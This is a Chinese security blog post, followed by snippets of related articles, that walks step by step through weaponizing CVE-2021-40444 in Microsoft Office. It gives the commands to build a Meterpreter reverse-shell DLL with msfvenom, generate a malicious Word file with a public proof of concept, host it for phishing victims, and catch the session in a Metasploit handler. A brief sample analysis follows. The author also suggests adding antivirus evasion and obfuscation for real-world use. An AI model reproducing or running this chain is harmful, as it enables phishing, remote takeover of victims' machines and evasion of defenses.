利用CVE-2021-40444漏洞钓鱼执法上线MSF

最新推荐文章于 2025-07-29 16:52:58 发布
原创 最新推荐文章于 2025-07-29 16:52:58 发布 · 3.5k 阅读 · 14 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全 #前端 #php
本文详细介绍了CVE-2021-40444漏洞,该漏洞允许攻击者通过特别设计的Microsoft Office文档在目标系统上远程执行代码。内容涵盖了漏洞描述、影响范围、测试环境、漏洞利用步骤以及病毒样本分析,涉及Windows系统和Office钓鱼攻击。同时,提供了利用POC生成含有后门的DLL,并通过Meterpreter工具实现目标主机上线。

0x01 漏洞描述

2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。

Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。

0x02 漏洞影响

漏洞编号:CVE-2021-40444

影响版本:Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本,覆盖面比较广泛,主要用于Office钓鱼。

0x03 测试环境

**攻击机:**kali-linux 2022.1

**靶机:**windows 10(office 2013)

本次漏洞使用lockedbyte师傅的POC,结合kali-linux中metersploit工具

下载地址:

(https://github.com/lockedbyte/CVE-2021-40444)

0x04 漏洞应用场景

4.1 Kali安装依赖包

sudo apt-get install lcab -y

图片

4.2 生成含有后门的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f dll -o http.dll

图片

下载Poc,进入CVE-2021-40444文件目录下修改exploit.py权限添加写权限,将生成的http.dll程序拷贝到Poc文件夹中并添加写权限。

sudo git clone https://github.com/lockedbyte/CVE-2021-40444

图片

4.3 利用POC脚本生成含有恶意代码的word文件

sudo python3 exploit.py generate http.dll 本地服务器URL

图片

含有恶意代码的Word文件生成后输出位置在out目录下。

图片

4.4 将含有恶意代码的word文件发送给目标

进入out目录下,启动Python服务器。

python3 -m http.server 80

图片

诱导目标用户点击含有恶意代码的word文件。

图片

4.5 创建监听

msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 12.12.12.134 //本地监听IPLHOST => 12.12.12.134msf6 exploit(multi/handler) > set LPORT 4444 //本地监听端口LPORT => 4444msf6 exploit(multi/handler) >exploit

4.6 漏洞触发

图片

文件启动时与服务器获取连接。

图片

目标主机成功上线MSF。

图片

0x05 病毒样本分析

5.1 本地杀软病毒样本检测

图片

5.2 在线病毒样本检测

恶意文件执行流程,文件中创建了MSOSYNC.EXE进程,该进程主要收集操作系统硬件相关的指纹信息

(MachineGuid,DigitalProductId,SystemBiosDate)获取系统信息,包含查询计算机时区的功能。

图片

5.3 样本分析详情

解压样本文件

图片

样本文件中的document.xml.rels中存储了指向的恶意html网站链接,浏览器会自动打开网站链接。

图片

该URL下载一个名为word.html,HTML中的JavaScript包含一个指向CAB文件的对象和一个指向INF文件的iframe. CAB文件已打开,INF文件存储在%TEMP%\Low目录中

由于CAB中存在路径遍历(ZipSlip)漏洞,因此可以将INF存储在%TEMP%中,使用“.cpl:”指令打开INF文件,导致通过rundll32侧面加载INF文件。

图片

攻击者通过伪造cab文件内嵌含有载荷的dll文件,借助漏洞使html文件JavaScript加载含有恶意代码的dll,从而远程执行payload。

文中漏洞利用并未进行免杀处理,如在生产环境下利用时,可结合Office宏病毒等免杀系列技巧进行免杀、混淆,从而获取目标控制权限。

参考链接

  1. https://baijiahao.baidu.com/s?id=1715778340261801914

  2. https://github.com/lockedbyte/CVE-2021-40444

  3. http://www.chinainfosec.org.cn/index.php?m=content&c=index&a=show&catid=57&id=488

  4. https://blog.csdn.net/qq_43332010/article/details/120463783

  5. https://www.ddosi.org/cve-2021-40444-exp/

声明

以上内容,均为文章作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

长白山攻防实验室拥有该文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的副本,包括版权声明等全部内容。声明长白山攻防实验室允许,不得任意修改或增减此文章内容,不得以任何方式将其用于商业目的。

大华科技摄像头产品非授权访问漏洞技术分析与防护方案
02-10
大华科技摄像头产品非授权访问漏洞技术分析与防护方案
【最新漏洞预警】天王级视频监控产品某华认证绕过漏洞CVE-2021-330*复现与分析
QTcyber的博客
11-12 8072
1.引言 某华是全球占有率排名第二的视频监控品牌。2021年10月,多款摄像产品曝光了认证绕过漏洞,攻击者可利用漏洞绕过身份验证,获得设备管理权限,可对摄像头进行配置修改、获取配置信息、修改口令、重启设备、添加用户等,危害很高,影响IPC/VTH/VTO/NVR/DVR等主流产品。 2.漏洞复现 根据github上POC中的`requirements.txt`搭建环境: sudo pip3 install -r requirements.txt 运行`Console.py`,登陆方式选择`l
Microsoft MSHTML远程代码执行(CVE-2021-40444)
huayimy的博客
02-03 468
Microsoft MSHTML远程代码执行(CVE-2021-40444).攻击者利用漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft Office文件,并诱导受害者打开文档,从而触发此漏洞。未经身份验证的攻击者利用漏洞,可获得受害者的当前用户权限,以该用户权限执行任意代码。打开后,靶机计算器被成功调用,至此漏洞利用成功。
漏洞深入分析-2021
dzqxwzoe的博客
02-04 1176
随着cve-2021-40444的披露,随机引爆了全球的网络安全,虽然最近微软发布了补丁,但是cve-2021-40444利用却越发猖狂。
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑
今天是几号的博客
04-22 2025
影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图。6、取出文档执行测试。
CVE-2021-40444漏洞复现详细
weixin_51203422的博客
09-14 1万+
2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 1、漏洞详情: Microsoft MSHTML远程代码执行漏洞 CVE-2021-40444 严重级别:严重 CVSS:8.8 被利用级别:检测到利用 危害:未经身份验证的攻击者可以利用漏洞在目标系统上执行代码。 在野利用:微软表示已经发现攻击者利用漏洞。在Office文档中添...
CVE-2021-40444复现
小小猪的博客
12-17 1951
CVE-2021-40444复现 漏洞描述: 2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,
DahuaLoginBypass 项目教程
gitblog_00846的博客
08-25 1023
DahuaLoginBypass 项目教程 项目介绍 DahuaLoginBypass 是一个 Chrome 扩展,利用 CVE-2021-33044CVE-2021-33045 漏洞,允许用户无需认证即可登录 Dahua 摄像头。这些漏洞可能在新版固件中被修复,因此建议用户在固件更新前使用此扩展。 项目快速启动 安装步骤 下载项目: git clone https://github.c...
CVE-2021-4034 漏洞修复方案
live的专栏
02-19 1935
1、目前RedHat、Ubuntu、Debian、SUSE等各大Linux厂商均已发布补丁版本修复了该漏洞,请受影响的用户从正规官方渠道升级到安全版本,若无法及时升级,可参考厂商官方提供的建议进行缓解。 2、若系统没有可用的补丁,可通过将pkexec中的 SUID-bit 删除进行临时规避,命令如: sudo chmod 0755 /usr/bin/pkexec
CVE-2021-40444_复现
PureDust的博客
09-14 1185
CVE-2021-40444_Microsoft MSHTML 远程代码执行复现准备上线设置cs,powershell,端口设置了8080复制word_dat为tmp_doc制作dll文件 准备 1.下载github的代码 https://github.com/lockedbyte/CVE-2021-40444 2.安装lcab sudo apt-get install lcab 3.安装编译环境 apt-get install mingw-w64 上线 设置cs,powershell,端口设置了808
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
include_voidmain的博客
06-30 704
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
RCE高危漏洞预警:CVE-2021-40444简要分析
「鸿渐之翼」的博客
09-24 2425
漏洞影响及其危害:未经身份验证的攻击者可以利用漏洞在目标系统上执行代码。 Microsoft发布了一份关于此漏洞的官方公告。 这篇博客文章讨论了该漏洞如何发挥作用.。 我们已获得多个利用漏洞的文档样本。文档包中的document.xml.rels文件中都包含以下代码: 请大家主要,存在一个URL(我们已删除),该URL下载一个名为side.html的文件(SHA-256:D0FD7ACC38B3105FACD699534242F28E45F5380FDF2EC93EA24BFBC1DC9E6)。该文件
CVE-2021-40444:Windows MSHTML 0day漏洞利用
HBohan的博客
09-11 1144
研究人员发现Windows MSHTML 0day漏洞利用,微软发布预防措施。 近日,多个安全研究人员向微软分别报告了MSHTML中的一个0 day远程代码执行漏洞。并发现了该漏洞的在野利用攻击活动。 MSHTML是Windows中用来渲染web页面的软件组件。虽然主要与IE相关,但也用于其他版本,包括Skype、Outlook、Visual Studio等。 CVE-2021-40444 研究人员在MSHTML中发现的0 day漏洞CVE编号为CVE-2021-40444,cvss评分为8.8分。由于MS
CVE-2021-40444漏洞复现
1ance's blog
09-25 4198
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
Dahua IPC 授权问题漏洞(CVE-2021-33045)
maverickpig的博客
01-14 1万+
Dahua IPC
CVE-2021-40444 0 day漏洞利用
HBohan的博客
09-13 4845
9月7日,微软发布安全公告称发现Windows IE MSHTML中的一个远程代码执行漏洞CVE编号为CVE-2021-40444。由于未发布漏洞补丁,微软只称该漏洞可以利用恶意ActiveX控制来利用office 365和office 2019来在受影响的Windows 10主机上下载和安装恶意软件。 随后,研究人员发现有攻击活动使用该恶意word文档,即该漏洞的0 day在野利用。 当office打开一个文档后,会检查是否标记为"Mark of the Web" (MoTW),这表示它来源于互联网。如
CVE-2021-40444分析报告微软MHTML远程命令执行漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1576
CVE-2021-40444漏洞概述.2021 年 8 月 21 日,MSTIC 观察到一名 Mandiant 员工在社交媒体上发布的帖子,该员工具有跟踪 Cobalt Strike Beacon 基础设施的经验。所写文章重点介绍了一个于 2021 年 8 月 19 日上传到 VirusTotal的 Microsoft Word 文档(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 对样本进行了
最详细利用kali的msf进行CVE-2019-0708漏洞复现
热门推荐
qq_43331608的博客
10-03 2万+
CVE-2019-0708 技术无罪,请勿用于恶意用途,出事本人不负一切责任 0.漏洞背景 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类...
CVE-2021-40444
最新发布
m0_73399576的博客
07-29 1259
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值